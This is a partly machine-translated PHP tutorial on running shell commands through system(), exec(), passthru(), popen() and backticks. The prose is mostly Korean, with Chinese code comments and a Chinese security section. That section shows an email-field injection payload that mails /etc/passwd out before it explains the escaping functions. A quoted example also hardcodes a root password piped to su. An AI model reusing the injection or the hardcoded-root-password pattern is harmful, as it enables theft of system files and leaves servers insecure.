PHP에서 시스템 외부 명령 실행

서버측 스크립팅 언어인 PHP는 단순하거나 복잡한 동적 웹 페이지 작성과 같은 작업을 완벽하게 수행할 수 있습니다. 그러나 항상 그런 것은 아니며 특정 기능을 구현하려면 운영 체제의 외부 프로그램(또는 명령)을 사용해야 하므로 절반의 노력으로 두 배의 결과를 얻을 수 있습니다.

그럼 PHP 스크립트에서 외부 명령을 호출하는 것이 가능한가요? 그렇다면 어떻게 해야 할까요? 당신의 우려사항은 무엇입니까? 나는 이 글을 읽고 나면 이러한 질문에 확실히 답할 수 있을 것이라고 믿습니다.

그게 가능할까요?

답은 '그렇다'입니다. 다른 프로그래밍 언어와 마찬가지로 PHP는 프로그램 내에서 외부 명령을 호출할 수 있으며 매우 간단합니다. 하나 또는 몇 가지 기능만 사용하면 됩니다.

전제조건

웹 프로그램 개발에는 기본적으로 PHP가 사용되기 때문에 보안은 사람들이 중요하게 생각하는 요소가 되었습니다. 그래서 PHP 디자이너는 PHP에 안전 모드라는 문을 추가했습니다. 안전 모드에서 실행하는 경우 PHP 스크립트에는 다음 네 가지 제한 사항이 적용됩니다.

외부 명령 실행

파일을 열 때 몇 가지 제한 사항이 있습니다

MySQL에 연결 데이터베이스

HTTP 기반 인증

안전 모드에서는 특정 디렉터리에 있는 외부 프로그램만 실행할 수 있으며 다른 프로그램에 대한 호출은 거부됩니다. 이 디렉터리는 php.ini 파일의 safe_mode_exec_dir 지시문을 사용하거나 PHP를 컴파일할 때 --with-exec-dir 옵션을 추가하여 지정할 수 있습니다. 기본값은 /usr/local/php/bin입니다.

결과를 출력할 수 있어야 하는 외부 명령을 호출했지만(PHP 스크립트에 오류가 없음을 의미) 공백이 표시된다면 네트워크 관리자가 안전 모드에서 PHP를 실행했을 가능성이 높습니다. .

어떻게 하나요?

PHP에서 외부 명령을 호출하려면 다음 세 가지 방법을 사용할 수 있습니다.

1) PHP에서 제공하는 특수 함수를 사용합니다.

PHP에서는 총 3가지 특수 함수를 제공합니다. 외부 명령을 실행하는 함수: system(), exec(), passthru().

system()

프로토타입: string system(string command [, int return_var])

system() 함수는 다른 언어의 함수와 유사합니다. 주어진 명령에 따라 결과를 출력하고 반환합니다. 두 번째 매개변수는 선택사항이며 명령이 실행된 후 상태 코드를 가져오는 데 사용됩니다.

예:

<?system（"/usr/local/bin/webalizer/webalizer"）；?>
exec（）

프로토타입: string exec (string command [, string array [, int return_var]])

exec() 함수는 system과 유사합니다. () , 또한 주어진 명령을 실행하지만 결과를 출력하지 않고 결과의 마지막 줄을 반환합니다. 명령 결과의 마지막 줄만 반환하지만 두 번째 매개 변수 배열을 사용하면 결과를 배열 끝에 한 줄씩 추가하여 완전한 결과를 얻을 수 있습니다. 따라서 배열이 비어 있지 않으면 호출하기 전에 unset()을 사용하여 배열을 지우는 것이 가장 좋습니다. 두 번째 매개변수를 지정한 경우에만 세 번째 매개변수를 사용하여 명령 실행 상태 코드를 얻을 수 있습니다.

예:

<?
exec（"/bin/ls -l"）；
exec（"/bin/ls -l", $res）；
#$res是一个数据，每个元素代表结果的一行
exec（"/bin/ls -l", $res, $rc）；
#$rc的值是命令/bin/ls -l的状态码。成功的情况下通常是0
?>

passthru()

프로토타입: void passthru (string command [, int return_var])

passthru()는 호출만 이 명령은 결과를 반환하지 않지만 명령 실행 결과를 그대로 표준 출력 장치에 출력합니다. 따라서 passthru() 함수는 pbmplus(원본 이미지의 바이너리 스트림을 출력하는 Unix에서 이미지 처리 도구)와 같은 프로그램을 호출하는 데 자주 사용됩니다. 또한 명령 실행의 상태 코드를 가져올 수도 있습니다.

예:

<?
header（"Content-type: image/gif"）；
passthru（"./ppmtogif hunte.ppm"）；
?>

2) popen() 함수를 사용하여 프로세스 열기

위 메서드는 단순히 명령을 실행할 수만 있고 프로세스와 상호 작용할 수는 없습니다. 명령. 그러나 명령에 무언가를 입력해야 하는 경우도 있습니다. 예를 들어 Linux 시스템 사용자를 추가할 때 su를 호출하여 현재 사용자를 루트로 변경해야 하며, su 명령은 명령줄에 루트 암호를 입력해야 합니다. 이 경우 위에서 언급한 방법을 사용하는 것은 당연히 불가능합니다.

popen() 함수는 프로세스 파이프를 열어 주어진 명령을 실행하고 파일 핸들을 반환합니다. 파일 핸들이 반환되므로 읽고 쓸 수 있습니다. PHP3에서 이러한 종류의 핸들은 쓰기 또는 읽기의 단일 작업 모드에서만 사용할 수 있으며, PHP4부터는 동시에 읽고 쓸 수 있습니다. 핸들이 한 가지 모드(읽기 또는 쓰기)로 열리지 않은 경우 pclose() 함수를 호출하여 핸들을 닫아야 합니다.

예 1:

<?
$fp=popen（"/bin/ls -l", "r"）；
?>

예 2(이 예는 PHP China Alliance 웹사이트 http://www.phpx.com/show.php?d=col&i=51에서 가져온 것입니다) :

/* PHP에서 시스템 사용자를 추가하는 방법

다음은 james라는 사용자를 추가하는 루틴입니다.

root 비밀번호가 매우 좋습니다. 참고용

*/
$sucommand = "su --login root --command";
$useradd = "useradd ";
$rootpasswd = "verygood";
$user = "james";
$user_add = sprintf（"%s \"%s %s\"",$sucommand,$useradd,$user）；
$fp = @popen（$user_add,"w"）；
@fputs（$fp,$rootpasswd）；
@pclose（$fp）；
?>

3) 백틱(`, 키보드 ESC 키 아래에 있는 것으로 ~와 같은 상단에 있음)을 사용합니다.

이 방법은 PHP 문서가 비밀로 존재하기 전에는 분류되지 않았습니다. 방법은 매우 간단합니다. 두 개의 백틱을 사용하여 실행할 명령을 표현식으로 묶습니다. 이 표현식의 값은 명령 실행의 결과입니다. 예:

<?
$res=`/bin/ls -l`;
echo &#39;<b><pre class="brush:php;toolbar:false">&#39;.$res.&#39;

'; ?>

이 스크립트의 출력은 다음과 같습니다.

hunte.gif

hunte.ppm

jpg.htm

jpg.jpg

passthru.php

무엇을 고려해야 합니까?

고려해야 할 두 가지 문제는 보안과 시간 초과입니다.

先看安全性。比如，你有一家小型的网上商店，所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件，让你的用户输入他们的EMAIL地址，然后把这个产品列表发给他们。假设你没有使用PHP的mail（）函数（或者从未听说过），你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样：

<?
system（"mail $to < products.txt"）；
echo "我们的产品目录已经发送到你的信箱：$to";
?>

用这段代码，一般的用户不会产生什么危险，但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址：

&#39;--bla ; mail someone@domain.com < /etc/passwd ;&#39;

那么这条命令最终变成：

&#39;mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt&#39;

我相信，无论哪个网络管理人员见到这样的命令，都会吓出一身冷汗来。

幸好，PHP为我们提供了两个函数：EscapeShellCmd（）和EscapeShellArg（）。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的，象分号（），重定向（>）和从文件读入（<）等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号，并把字符串中的单引号转义，这样这个字符串就可以安全地作为命令的参数。

再来看看超时问题。如果要执行的命令要花费很长的时间，那么应该把这个命令放到系统的后台去运行。但在默认情况下，象system（）等函数要等到这个命令运行完才返回（实际上是要等命令的输出结果），这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中，如：

<?
system（"/usr/local/bin/order_proc > /tmp/null &"）；
?>